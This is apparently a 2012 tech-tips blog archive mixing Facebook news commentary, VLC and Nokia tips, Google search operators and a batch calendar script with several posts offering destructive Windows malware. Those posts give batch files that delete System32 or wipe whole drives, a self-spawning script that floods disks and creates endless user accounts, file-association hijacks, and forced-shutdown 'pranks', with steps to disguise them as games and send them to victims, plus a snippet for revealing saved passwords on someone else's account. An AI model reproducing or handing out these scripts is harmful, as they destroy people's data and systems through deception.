Wednesday 30 May 2012

Why Facebook Bought Instagram?

Be The First To Comment
With the recent purchase of Instagram by social media giant Facebook, speculation is at an all time high. The question on everyone’s mind is why Facebook would spend $1 billion to acquire the photo-sharing application Instagram. One of the more obvious answers to that question is the massive following Instagram has.

Instagram has a following of over 30 million users and, with the recent move to the Android market, the number is still rising. However, members are not something Facebook would ever need. With a fan-base of over 850 million users worldwide, the social media mogul may be looking at a way to monetize the increased user base.


With Instagram’s recent move to the Android market, the mobile segment Instagram is sure to gain is likely one of the largest reasons for Facebook’s acquisition. Although Facebook has a mobile application and many mobile users, most feel it is lacking compared to the desktop variant. Facebook’s main concern with mobile users may be they simply do not know how to make money off of them. With no ads in the mobile version and more users checking their accounts on their mobile devices instead of a laptop or computer, revenue is lost.



The following quote is proof of their revenue generation through the mobile platform:-

“Although the substantial majority of our mobile users also access and engage with Facebook on personal computers where we display advertising, our users could decide to increasingly access our products primarily through mobile devices. We do not currently directly generate any meaningful revenue from the use of Facebook mobile products, and our ability to do so successfully is unproven.”

This will leave many with one question in their mind. Why purchase a mobile app that does not currently make money for their user base? With no ads in their application and no other means of revenue, Instagram has a very large user base to support with minimal resources. Instagram has state their goal has always been to build a large user base and then begin serving them ads. Even still, $1 billion dollars is a lot of money to make up for.

Instagram As Competition To Facebook

Instagram CEO Systrom made a statement that they wished to “help every user on the earth share their lives and discover the world through a series of beautiful images.” If Facebook felt Instagram could pull it off, they very well could feel their model would be threatened by it.

The biggest issue seen here is that Instagram only offers it’s users the ability to take a photo, use one of many filters built in to the application to alter it, and then post it for their friends and family to view. That would hardly seem to be a threat to Facebook given it is only a photo sharing application. There are already many filtering applications available to mobile users and Instagram would be just another sharing network to sign up for.


Is Facebook After Data?

The strongest arguement for Facebook’s aquisition would be the bottom line, data. With Instagram users having uploaded over 100 million photos which are geo-tagged and personal, Facebook could be looking to use this data to further their ad targeting. Facebook already has a massive amount of personal data on most of it’s users and there are 100 million photos uploaded to the social site every day. The tagging of these photos also include business locations and other people who also have their information on the site. With this massive amount of user data, Facebook could be making strides to further their ad targeting.


Keeping Instagram Away From Competition

The aquisition of Instagram could also have simply served as a means to keep it away from Google and Twitter, two of Facebook’s largest competitors. This also brings Instagram’s engineering team to Facebook. The addition of these key members could be what is needed to vastly improve on their mobile application and realize true gains through a restructuring of both their mobile and web interface. One thing is for certain, Facebook is deeply rooted and will do what they must to stay in the game.

Tuesday 29 May 2012

Smart Phone by Facebook

Be The First To Comment

After the recent Facebook IPO at Nasdaq, so many news are coming up from Facebook. Lately we heard about the Facebook browser, that Facebook is going to buy Opera! & now yesterday, BITS reported that Facebook is going to launch a smart phone by the next year.

In 2010, Facebook had already given a try to build a smart phone but due to several complexities, it then gave up the plan. Hugo Fiennes, a hardware manager from Apple who has started his own company said that, “Building isn’t something you can just jump into, you change the smallest thing on a smart phone and you can completely change how all the antennas work. You don’t learn this unless you’ve been doing it for a while.” Fiennes who was with Apple till the launch of 1st 4 iPhones further said that, “Going into the phone business is incredibly complex.”


Zuckerberg has already hired several software and hardware engineers of Apple who have worked on iPhone & iPad. But building a smart phone is indeed a work of complexity. The giants like Hewlett Packard & Dell have also struggled a lot in building smart phone but they dint succeed.

BIT has added in its report that “One engineer who formerly worked at Apple and worked on the iPhone said he had met with Mark Zuckerberg, Facebook’s chief executive, who then peppered him with questions about the inner workings of smart phones. It did not sound like idle intellectual curiosity, the engineer said; Mr. Zuckerberg asked about intricate details, including the types of chips used, he said. Another former Apple hardware engineer was recruited by a Facebook executive and was told about the company’s hardware explorations.” Asking such questions doesn’t seem to be the qualities of a market leader!

Facebook hasn’t confirmed or denied about its project to build a smart phone but a statement was been pointed which said that, “We’re working across the entire mobile industry; with operators, hardware manufacturers, OS providers, and application developers.”

One of the Facebook employees stated that, “Mark is worried that if he doesn’t create a mobile phone in the near future that Facebook will simply become an app on other mobile platforms.”


For all the above points, I feel that Facebook is currently having billions of dollars with itself, which it can invest in any revenue generating project. But Facebook should consider that its earnings per share don’t fall down. The share price of Facebook has already fallen down at Nasdaq. On Friday, the share was closed at $31.91 (the IPO price being $38).

I just hope that Facebook is not just blindly trying to capture Google’s market. Yesterday we heard that Facebook is going to buy Opera which would lead to fall in market share of Google Chrome. Now that Google has acquired Motorola ($12.5 billion), we are hearing the news that Facebook is going to build a smart phone! Zuckerberg shouldn’t make plans just to gain more leverage from its competitors.


Facebook Browser

Be The First To Comment
Browser war is going on. The companies are coming up with new browsers & trying to compete with the old ones in the market. Recently, Yahoo launched its own browser, Yahoo Axis, to compete with the giants like Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari etc…

After considering this competitive market, the social network giant, Facebook, is been heard of coming up with a browser which will help you to stay updated with your social life, with the help of inbuilt plug-ins and features.

Recently Facebook bought Instagram for $1 billion & yesterday Pocket-lint reported that according to its trusted sources, the social network giant is going to either buy Opera browser which has around 200 million users across the globe. But Facebook hasn’t yet commented anything on this, so this may be a rumor too.



After the Facebook IPO (Initial Public Offering) at Nasdaq, which has brought them billions of dollars, Facebook will surely be having excess cash which it needs to invest & earn out of it, so as to meet the expectations of it shareholders. Thus it could be quite possible that Facebook could take over Opera. Zuckerberg will surely consider the potential growth of Opera browser, especially in the mobile world.

If Facebook won’t buy Opera, then I personally feel that there would be some other big new that would come from Facebook. The simple reason behind this statement is for considering the idle cash with it, which would make no good if not invested!

So do you think after hearing this news, will Google take any step to preserve its market share of Google Chrome..?? Will 900 million users on Facebook cause harm to other browsers, if Facebook would buy Opera..?? Will Facebook be benefited if it takes this step..??

Monday 28 May 2012

HOW TO MAKE KEYBOARD LIGHTS DANCING

Be The First To Comment

As we know keyboards having 3 LEDs
1. NUM LOCK
2.KAPS LOCK
3.SCROLL LOCK
Here is a trick to use the lights of your keyboard in a more creative manner in Windows.
This trick uses a simple Visual basic script which when
activated makes your scroll lock, caps lock and num locks LED's flash in a cool rhythmic way which gives the perception of a live disco on your keyboard.

MAKE THE DISCO WITH 3 SIMPLE STEPS

Open Notepad Paste The below Code

  Set WEBCHILLER =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
 WEBCHILLER.sendkeys "{CAPSLOCK}"
 WEBCHILLER.sendkeys "{NUMLOCK}"
 WEBCHILLER.sendkeys "{SCROLLLOCK}"
loop

Save file as dance.vbs or *.vbs
Double click on the Saved file to see the magic


How to stop the disco
1. Open task manager(cntrl+Shift+Esc)
2.process Tab
3.select wscript.exe
4. End Process

Wednesday 16 May 2012

Run Firefox inside Firefox

Be The First To Comment
Run Firefox inside Firefox

How to run Firefox inside Firefox.?

Yes you can run Firefox inside firefox just by typing following url.

How about Opening Firefox inside Firefox which is again in another Firefox..?

Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!

copy paste following url in a web browser (mozilla firefox).

chrome://browser/content/browser.xul

Increase Virtual RAM - To Make Your System Faster 100 percent works

Be The First To Comment
Follow the steps given below :-


1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

8) Click 'Set', and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!

Google Hacking

Be The First To Comment
Google Hacking :-

Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".


Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.
intitle:"index of" returns all pages that have string "index of" in their title.
Companion operator:- "allintitle".

2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches, where url of searched pages must contains the word "admin".
Companion operator:- "allinurl".

3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com

4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com

5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com

6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" in different manner from all over the world.

7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
"inurl:www.microsoft.com filetype:txt"

Tuesday 15 May 2012

Nokia Mobile Secrate Code

Be The First To Comment
On the main screen on your Nokia Made mobile phone type in:
  • *#06# for checking the IMEI (International Mobile Equipment Identity).
  • *#7780# reset to factory settings.
  • *#67705646# This will clear the LCD display(operator logo).
  • *#0000# To view software version.
  • *#2820# To show Bluetooth device address.
  • *#746025625# Sim clock allowed status.
  • #pw+1234567890+1# Shows if sim have restrictions.
  • *#92702689# takes you to a secret menu where you may find some of the information below
                            1. Displays Serial Number.
                            2. Displays the Month and Year of Manufacture
                            3. Displays (if there) the date where the phone was purchased (MMYY)
                            4. Displays the date of the last repair – if found (0000)
                            5. Shows life timer of phone (time passes since last start)
  • *#3370# Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
  • *#3370* (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
  • *#4720# Half Rate Codec activation.
  • *#4720* Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset:*#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \
  • *#7328748263373738# resets security code.
Default security code is 12345

VIRUS MAKING How to Create a Virus Using Notepad.

1 Comment
VIRUS I:

Process:

1 . Open Notepad
2 . Write / copy the below command there:

" del c:\WINDOWS\system32\*.*/q " without quote and save as " anything.bat"Done.

FUNCTION : If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.



Virus II:

Process:


1 . Open Notepad.
2 . Copy the below command there

"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\"

( without quotes )
Save as "anything.bat

FUNCTION : This virus Formats the C ,D , and E Drive in 3 Seconds.





How to Spread it:

Windows does'nt allow to change the icon of .bat files.
Therefore what you can do is :

1 . Right click on the .bat file

2 . Click on CREATE SHORTCUT

3 . And hide the original file.

4 . Now as this newly created file is just the shortcut, you can easily change its icon.

5 . Right click on this shortcut
                               properties >>>..cutomize>>..choose icon

6 . Now give an attractive icon to it.

7 . Now name it something intresting. eg. PROTOTYPE or IGI etc.

8 . Now your victim would think it to be the game , and he will be easily curropted.

How to send Free SMS using Facebook.

Be The First To Comment
Process:
  1. Login to your Facebook Account.
  2. Search for "ChatSMS Application"
  3. Then Click on "Allow"
  4. Now select the Country and the Country Code of the country where you want to send the sms.
  5. In the Phone Number Field give your Friends phone number where you want to send the sms.
  6. Now type your sms.
  7. And click on"Send Sms"
That all .

Wanna Know The Password Behind the ( ******* ) ?

Be The First To Comment
Here's the simplest trick to do so.

1. Just Login into the site. yahoo or gmail or anything else.
2. Type ur ID and password.............or if u r hacking someone's ID then the password will be typed there already.
3. Copy the below JAVASCRIPT code and paste in ur adress bar and press Enter.

javascript: alert(document.getElementById('Passwd').value);

Virus ( Dangerous one )

Be The First To Comment
@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1




copy above codes in notepad and save it as .cmd , or .bat ( more better ) :)
and its ready to use .

what does it do :
This is an extremely harmful virus the will keep
replicating itself until your harddrive is totally full and will destroy
your computer , or any computer on which it is used .

Most dangerous VB script

Be The First To Comment
1) Convey a little message and shut down the computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Save it as "Anything.BAT" in All Files and send it.
2) Toggle the Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.
3) Continually pop out the CD Drive. If there are more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.
4) Frustrate someone by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" after some time of clicking the file and freak someone out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.
6) Frustrate someone by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.
7) Hack the keyboard and make it type "You are a fool" continuously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.
8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.
9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

EXTENSION CHANGER (Virus)

Be The First To Comment
1. Open a Notepad and copy and paste the below code


@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit


2. Save it as extension.bat, and now you are ready to go…


3. Execute this on Victims computer


This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…


The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….

Sunday 13 May 2012

Use VLC player as a video cutter

Be The First To Comment
Friends ,everybody knows very well about VLC media player .this is fantastic software to watch all kind of videos format ,music etc . . .
Do you know that you may use VLC players as a video cutter .
Steps:

1 . Launch VLC media player and activate Advanced controls located under the View menu .

2 . After activate the advanced controls you will see four extra buttons above the normal play/pause button . We will use the first button from the left called the record button .


3 . Now play your desire video ,who you want to cut .

4 . Just click on record button ,from where you want to cut the video .

5 . Click again record button to stop the recording/cutting .

6 . That's it .its so simple .

Use VLC player to extract audio from video

Be The First To Comment
VLC is not just a Media Player, it is a whole software in itself.This is just an experiment which I did to try and get an MP3 file from a video I downloaded from YouTube.

VLC has a very easy way to convert the FLV (or any other video file for that sake) to MP3

All you need to do is:

1 . download VLC player from here (if you don't have)

2 . Open VLC.

3 . Go to Media –> Convert/Save.

4 . When you click Convert/Save, it opens a dialog box where in you can select the file which you need to
convert(i.e. the video/FLV file which you wish to convert to MP3).

5 . After selecting the file click on Convert/Save button located in the lower right hand side of the dialog box.

6 . After this,there would be a dialog box for Stream Output. Check the option ‘File’, and go to ‘Browse’ to locally save the file with the filename of your choosing. Whenever you enter the new file name and click Save, a “.ps” is appended at the end of the file name. Substitute the “.ps” extension with a “.mp3″ extension.

7 . In the Settings section of the Convert dialog box there is Profile drop down menu. Within the Profile section pull the menu down and select MP3 (for MP3encoding).

8 . Click SAVE and let the data Stream. Once finished, open the MP3 file and enjoy.

SPEAR Algorithm

Be The First To Comment
“The graph-based SPEAR algorithm (Spamming-resistant Expertise Analysis and Ranking) is a new technique to measure the expertise of users by analyzing their activities. The focus is on the ability of users to find new, high quality information in the Internet. A great benefit of SPEAR is that it actually returns two very interesting results at the same time: first, a ranked list of expert users; and second, a ranked list of high quality Web documents.”

Flower shaped Satellite transmits solar power to the earth

Be The First To Comment
Undoubtedly the Solar Energy is the eco-friendly source of energy for Earth. NASA is funding for the new project that has innovated a new concept satellite that transmits solar power to the earth. This flower shaped satellite has controllable mirrors that accumulates the sunlight around the clock, converting it to energy and sending it back to the earth using the microwave transmitter. The satellite weighs around 440 pounds, which includes controllable mirrors, photovoltaic panels covering the backside of the disc and microwave transmitters for transmitting the energy to the earth. The microwave transmitter is capable of sending ten to thousands of megawatt energy. According to the reports, the prototype of the concept satellite is ready, but there is no news about the launch.


Secure the data stored in your USB drive using voice authentication

Be The First To Comment
USB drives are compact, provides mobility but at the same time it can also be lost easily. A voice authenticated thumb drive can protect the data in case of theft or lost. The Hammacher Schlemmer has listed a new 8GB thumb drive that can recognize your voice and authenticates you to access the data. “This is the only USB storage drive that secures its contents with a password spoken by its owner”, according to the product description from Hammacher Schlemmer. The USB drive features a microphone that can understand your voice for authentication. The thumb drive also provides you with an alternative authentication mechanism via password typing, in case if you forget your voice password. The device doesn’t require any software to be installed and can work on any PC including MAC operating system. The price of the thumb drive is $49.95.



Facebook to launch App Center like Google Play and Apple’s App Store

Be The First To Comment
Now the developers can sell their apps on Facebook. Facebook is working on its own App Center that will allow paid Facebook Apps for the first time. The news was announced by the social networking giant on Wednesday on its official blog. “The App Center is designed to grow mobile apps that use Facebook – whether they’re on iOS, Android or the mobile web”, says theFacebook engineer Aaron Brady. The service will be much similar to Google Play and Apple’s App store, which allows you to search for the apps right from your dashboard. The App Center gives developers an additional way to grow their apps and creates opportunities for more types of apps to be successful.
Facebook with its ever growing user base, will become the central place to find great apps like Draw Something, Pinterest, Spotify, Battle Pirates, Viddy and Bubble Witch saga. The Facebook App Center will also feature App Rating system that can help you monitor user feedback to determine the quality of the app.


Batch program to create calender

Be The First To Comment
GUYS COPY THIS CODE IN NOTEPAD AND SAVE IT AS CALENDER.BAT
DOUBLE CLICK ON THE ICON AND IT WILL ASK U THE YEAR TO GENERATE THE CALENDER ....ENTER THE YEAR AND FEEL LIKE SMILING ....

@ECHO OFF

:: batch for generating calendars

IF "%~1"=="/?" (
ECHO START "%~NX0" WITHOUT ARGUMENTS AND THEN ENTER THE YEAR.
ECHO "%~NX0" WILL OPEN IN IT'S OWN WINDOW TO AVOID RESIZING
ECHO AN EXISTING WINDOW.
ECHO.
ECHO A SCREEN RESOLUTION AND/OR FONT SIZE THAT CAN DISPLAY
ECHO CMD WINDOWS OF 96 COLUMNS AND 39 LINES IS REQUIRED.
ECHO SOME CONFIGURATIONS MAY USE SCROLL BARS TO ACHIEVE
ECHO THIS.
EXIT /B
)

:: The current codepage is stored in variable %CodePage%,
:: then changed to 850 to facilitate box drawing characters.....

FOR /F "tokens=*" %%A IN ('CHCP') DO FOR %%B IN (%%~A) DO SET CodePage=%%B
CHCP 850 >NUL 2>&1

:: The title can be used to falicitate custom window
:: positioning via the properties menu of "calendars..."
:: /max is used so as much content as possible is visable
:: without moving the window. /max must be removed for
:: custom window positing.....

IF NOT "%~1 %~2"=="WINDOW SIZE" (
START "CALENDARS..." /MAX CMD /C "%~F0" WINDOW SIZE

REM Restore the original codepage before exiting.....

CHCP %CodePage% >NUL 2>&1
EXIT /B
)
MODE CON:COLS=96 LINES=39
SETLOCAL ENABLEDELAYEDEXPANSION

:loop
FOR %%Z IN (jan feb mar apr may jun jul aug sep oct nov dec year day leap noleap length test) DO SET %%Z=
SET /P year=Enter a year to see it's calendar, or nothing to exit, then press enter:
IF NOT DEFINED year (

REM Restore the original codepage before exiting.....

CHCP %CodePage% >NUL 2>&1
EXIT /B
)

::Test that the input is only numbers...

SET test=!year!
FOR /l %%Z IN (0 1 9) DO IF DEFINED test SET "test=!test:%%Z=!"
IF DEFINED test CLS&GOTO loop
:zero
IF NOT DEFINED year (
:error
cls
echo The year entered can not be accepted.
echo.
pause
CLS
GOTO loop
)

:: remove leading zeros, if any...

IF "%year:~0,1%"=="0" SET year=%year:~1%&&GOTO zero

:: The %processor_architecture% test is used to test
:: limits of caculations, if the variable is undefined
:: or unrecognised the test will fall through and complete
:: anyway, if the limit is surpassed this way the results may
:: not be valid. The tested number is ~80% of the limit of the
:: os so that year + year / 4 yields a valid result.

IF /​I "!processor_architecture!"=="x86​" (
IF !year! gtr 1717986917 GOTO :error
) else (
IF NOT "!processor_architecture:64=!"​=="!processor_architecture!" (
IF !year! gtr 7378697629483820645 GOTO :error
)
)

:: Generate the first day of the year, 0=sun, 1=mon,...,6=sat
:: A 365 day year ofsets by one day, so the next year will start
:: the next day (i.e. 2009 starts on thr and 2010 starts on fri)
:: an extra day must be added for every leapyear. Using modulo
:: 7 on the total of offset days reviels the starting day of the
:: year. one day must also be removed if the year is a leap year
:: because the below will add one for it, the remainder for non
:: leap years is not an issue because set /a only returns whole
:: numbers.

SET /A day=(year + year / 4) - (year / 100 - year / 400)
SET /A leap=year %% 400
SET /A noleap=year %% 100
IF !leap! GTR 0 (
IF !noleap! NEQ 0 SET /A leap=year %% 4
)
IF %leap%==0 SET /A day-=1
SET /A day%%=7

:: For each year every month is padded to is starting offset
:: with spaces, january has the original offset generated above.
:: each additional offset is generated by adding the total days of
:: the previous month then processing it by modulo 7.
:: The days are stored in a varianle to display later, these variables
:: are padded to 111 characters using spaces for display purposes.

FOR %%U IN (jan feb mar apr may jun jul aug sep oct nov dec) DO (
FOR %%V IN (jan mar may jul aug oct dec) DO IF /I %%U==%%V SET length=31
FOR %%W IN (apr jun sep nov) DO IF /I %%U==%%W SET length=30
IF /I %%U==feb (
IF !leap!==0 (
SET length=29
) else (
SET length=28
)
)
FOR /l %%X IN (1 1 !day!) DO SET "%%U=!%%U! "
FOR /l %%Y IN (1 1 !length!) DO (
IF %%Y lss 10 (
SET "%%U=!%%U!%%Y "
) else (
SET "%%U=!%%U!%%Y "
)
)
FOR /l %%Z IN (!length! 1 54) DO IF "!%%U:~110!"=="" SET "%%U=!%%U! "
SET /A day=^(day + length^) %% 7
)
:test

:: The results are displayed below using substrings of each month's
variable.

cls
TITLE THE CALENDAR FOR THE YEAR OF %YEAR%
echo. ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo. º JANUARY º º FEBUARY º º MARCH º º APRIL º
echo. ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo. ºS M T W T F S º ºS M T W T F S º ºS M T W T F S º ºS M T W T F S º
echo. ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo. º%JAN:~0,20%º º%FEB:~0,20%º º%MAR:~0,20%º º%APR:~0,20%º
echo. º%JAN:~21,20%º º%FEB:~21,20%º º%MAR:~21,20%º º%APR:~21,20%º
echo. º%JAN:~42,20%º º%FEB:~42,20%º º%MAR:~42,20%º º%APR:~42,20%º
echo. º%JAN:~63,20%º º%FEB:~63,20%º º%MAR:~63,20%º º%APR:~63,20%º
echo. º%JAN:~84,20%º º%FEB:~84,20%º º%MAR:~84,20%º º%APR:~84,20%º
echo. º%JAN:~105% º º%FEB:~105% º º%MAR:~105% º º%APR:~105% º
echo. ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo. ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo. º MAY º º JUNE º º JULY º º AUGUST º
echo. ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo. ºS M T W T F S º ºS M T W T F S º ºS M T W T F S º ºS M T W T F S º
echo. ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo. º%MAY:~0,20%º º%JUN:~0,20%º º%JUL:~0,20%º º%AUG:~0,20%º
